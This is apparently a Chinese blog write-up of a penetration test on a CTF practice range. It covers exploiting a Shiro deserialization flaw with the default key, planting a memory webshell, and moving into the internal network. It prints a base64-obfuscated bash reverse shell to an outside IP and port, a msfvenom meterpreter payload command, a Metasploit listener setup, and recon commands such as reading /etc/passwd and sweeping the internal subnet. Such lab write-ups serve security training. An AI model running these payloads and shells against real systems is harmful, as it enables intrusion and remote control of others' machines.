0%

记录某靶场渗透测试

CTF-Archives项目里非常不错的一个靶场

记录某靶场渗透测试

环境搭建

这里我是直接拿巨魔搭建的环境去打了,需要复现的请自行搭建

项目地址:https://github.com/CTF-Archives/Puff-Pastry

整体配置图如下

image-20240726110222368


渗透过程

信息搜集

fscan扫描一下

1
.\fscan.exe -h 139.9.4.56

扫描结果如下

image-20240726113327569

扫出来8080端口存在shiro反序列化,密钥是默认密钥

1
kPH+bIxk5D2deZiIxcaaaA==

外网打点

我们访问一下8080端口,发现是登陆界面

image-20240726113010804

打开shiro利用工具,修改为POST请求,添加上密钥看看

image-20240728164920663

说明存在漏洞,并且爆出利用链

当前为root权限

image-20240726123511126

直接写入内存马,然后蚁剑选择jsp连接类型连接

image-20240728171605559

当然也可以写个sh文件来弹shell(这里SummerSec写的工具echo命令有问题,我换成v2.2版本写的)

1
2
3
# bash -i >& /dev/tcp/156.238.233.68/1028 0>&1
echo "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTYuMjM4LjIzMy42OC8xMDI4IDA+JjE=|base64 -d|bash" > /tmp/shell.sh
chmod +x /tmp/shell.sh

蚁剑连接上后,在根目录下拿到第一个flag

image-20240726161923968

联动蚁剑上线metasploit

先用msfvenom生成linux的马

1
msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=156.238.233.68 LPORT=1028 -f elf -o payload.elf

image-20240728172739921

将生成的马上传到/tmp目录下,赋予elf文件可执行权限

image-20240728172814279

然后开启msf监听器

1
2
3
4
5
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost 156.238.233.68
set lport 1028
run

再执行elf文件成功上线metasploit

image-20240728173404631

内网渗透

因为蚁剑的shell权限比较高,所以直接在蚁剑进行信息收集

本机基础信息收集

查看网络配置信息
1
ifconfig

本机所处网段为192.168.100.0/24

image-20240726162432184

查看操作系统信息
1
uname -a

尝试systeminfo发现不是windows系统,执行uname得到本机为Ubuntu系统

image-20240726162610669

查看用户信息
1
cat /etc/passwd

image-20240726162922688

探测内网存活主机

执行background回到msf6会话,基于ARP协议来发现内网存活主机

1
2
3
use auxiliary/scanner/discovery/arp_sweep
set RHOSTS 192.168.100.0/24
exploit

这里换其他协议都扫不出来,那只能上传fscan来扫

1
./fscan -h 192.168.100.0/24

image-20240728181023781

发现还存在ip为192.168.100.2的主机


参考文章

Ubuntu安装metasploit

metasploit探测内网存活主机